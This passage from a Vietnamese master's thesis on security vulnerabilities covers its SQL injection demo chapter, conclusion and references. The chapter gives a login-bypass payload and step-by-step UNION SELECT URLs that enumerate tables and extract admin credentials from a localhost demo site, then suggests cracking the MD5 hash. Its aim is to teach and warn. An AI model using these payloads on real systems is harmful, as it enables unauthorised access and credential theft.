THỬ NGHIỆM CHƯƠNG TRÌNH

Một phần của tài liệu (LUẬN văn THẠC sĩ) nghiên cứu một số lỗ hổng thiếu an ninh trong ứng dụng công nghệ thông tin, phương pháp và công cụ kiểm soát, xử lý lỗ hổng (Trang 82)

Chương 3 MÔ PHỎNG TẤN CÔNG DẠNG SQL INJNECTION

3.2. THỬ NGHIỆM CHƯƠNG TRÌNH

1- Menu chức năng

2- Cử sổ mo phỏng trình duyệt

3- Code php tương ứng của chương trình

4- Câu lệnh SQL tương ứng với thao tác truy xuất dữ liệu của người dùng. 3.2.1. Tấn công vượt qua kiểm tra đăng nhập

Cách thức vượt qua kiểm soát:

Đăng nhập với thông tin đăng nhập bất kì sau đó đăng nhập với thông tin sau đây. Tên đăng nhập: ' or 'x'='x

Màn hình login thành công xuất hiện như sau:

Nhu vậy chúng ta đã thực hiện thành công tấn công vượt qua kiểm tra đăng nhập

3.2.2. Tấn công xử dụng câu lệnh Union Select.

Code xử lý:

Tấn công:

Bước 1: Kiểm tra lỗi SQL Injection

Bước 2: Tìm số cột mà câu truy vấn tạo ra dung order by (số cột)

- http://localhost/Demo/news.php?id=16 order by 2 => không lỗi

- http://localhost/Demo/news.php?id=13 order by 3 => Lỗi => Số cột là 2

Bước 3: Tìm cột chứa thông tin có thể khai thác được

http://localhost/Demo/news.php?id=13 union select 1,2

Bước 4: Xác định tên bảng chưa thông tin người quản trị

http://localhost/Demo/news.php?id=13 union select 1, group_concat (table_name) from information_schema.tables where table_schema=database()

Bước 5: Xác định các trường dữ liệu của bản chứa thông tin quản trị

http://localhost/Demo/news.php?id=13 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x75736572

Bước 6: Xác định tài khoản và mật khẩu của người quản trị

http://localhost/Demo/news.php?id=150 union select user_name, pass from user

Bước 7: Giải mã mật khẩu nếu có rồi tìm link trang đăng nhập và chiếm quyền quản trị

Web giải mã md5: http://hashkiller.co.uk/ Code fix lỗi:

KẾT LUẬN

Luận văn giới thiệu và đưa ra cảnh báo với một số hình thức tấn công gây mất an toàn thông tin vào các hệ thống ứng dụng CNTT hiện nay. Mô tả chi tiết một số dạng tấn công phổ biến như:

+ Tấn công giao thức SSL/TSL:

- Mô tả chi tiết cách thức tấn công BEAST giải mã thông điệp - Đưa ra biện pháp khắc phục

+ Tấn công DDoS:

- Đưa ra các mô hình tấn công DDoS và mô tả chi tiết - Đưa ra một số biện pháp khắc phục cơ bản

+ Tấn công dạng SQL injection:

- Đưa ra các cách thức tân công SQL injection lên trang web như: Tấn công vượt qua kiểm soát truy nhập, tấn công sử dụng câu lệnh union select, tấn công sử dụng câu lệnh insert

- Đưa ra một số biện pháp khắc phục

Các dạng tấn công về cơ bản cho ta thấy được sự nguy hiểm hiểm khi hệ thống mắc phải những lỗ hổng về an toàn, bảo mật thông tin. Luận văn đưa ra cái nhìn cụ thể hơn về một số lỗ hổng an toàn bảo mật để cảnh báo cho người sử dụng các cơ quan nhà nước, doanh nghiệp nhận thấy được tầm quan trọng của việc đảm bảo an toàn thông tin và tham khảo các biện pháp để khắc phục những lỗ hổng này.

Các nội dung trong luận văn mới chỉ là các bước nghiên cứu mở đầu, đây cũng là tiền đề để tôi tiếp tục nghiên cứu chuyên sâu hơn về 3 dạng tấn công gây mất an toàn thông tin vào giao thức SSL/TSL, Tấn công DDoS, Tấn công dạng SQL injection. Đồng thời nghiên cứu mở rộng một số loại tấn công gây mất an toàn thông tin khác.

TÀI LIỆU THAM KHẢO Tiếng Việt

[1] Ban cơ yếu chính phủ (2014), bài viết về tấn công BEAST.

[2] Phân loại tấn công DDoS và các biện pháp phòng chống. Tác giả Hoàng Xuân Dậu, Học viên bưu chính viễn thông.

[3] Tấn công từ chối dịch vụ Dos,Ddos,DRDos. Tác giả Ng. Thanh Nghị-HVA [4] Tấn công mạng máy tính. Tác giả PGS.TS Nguyễn Hiếu Minh

[5] Tấn công kiểu SQL Injection-Tác hại và phòng tránh. Tác giả Lê Đình Duy- Khoa CNTT-Trường ĐH Khoa Học Tự Nhiên TP.HCM

[6] Trần Minh triết, Bài giảng Modes of Operation và Padding Scheme

[7] Trịnh Nhật Tiến, Giáo trình an toàn dữ liệu – Khoa công nghệ thông tin, Đại học Công nghệ, Đại học quốc gia Hà Nội.

Tiếng Anh

[8] An Introduction to SQL Injection Attacks For Oracle Developers.Author Stephen Kost

[9]. Pratik Guha Sarkar, Shawn Fitzgerald (2013), ATTACKS ON SSL A COMPREHENSIVE STUDY OF BEAST, CRIME, TIME, BREACH, LUCKY 13 & RC4 BIASES

[10]. Thai Duong, Juliano Rizzo (May 13, 2011), Here Come The Ninjas. [11] Kevin Spett, SQL Injection-Are you web Applications vulnerable. [12] http://z6.invisionfree.com/iu4rum/ar/t98.htm

Một phần của tài liệu (LUẬN văn THẠC sĩ) nghiên cứu một số lỗ hổng thiếu an ninh trong ứng dụng công nghệ thông tin, phương pháp và công cụ kiểm soát, xử lý lỗ hổng (Trang 82)

Tải bản đầy đủ (PDF)

(91 trang)